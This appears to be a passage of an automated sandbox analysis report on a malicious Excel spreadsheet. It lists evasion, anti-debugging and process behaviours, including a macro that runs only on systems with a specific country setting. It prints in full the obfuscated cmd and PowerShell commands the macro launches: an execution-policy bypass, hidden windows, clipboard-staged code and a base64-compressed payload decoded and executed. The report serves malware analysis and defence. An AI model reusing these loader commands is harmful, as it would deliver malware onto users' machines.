Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\clip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\clip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Document contains an embedded VBA which only executes on specific systems (country or language check)

Show sources

Source: 20310_011_11353_0_88.xls

Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : Open()If Application.International(xlCountrySetting) = 39 T

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1348	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2044	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe Cmd /C %QJi:''='%	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\clip.exe cLiP	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )	Jump to behavior

Language, Device and Operating System Detection:

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
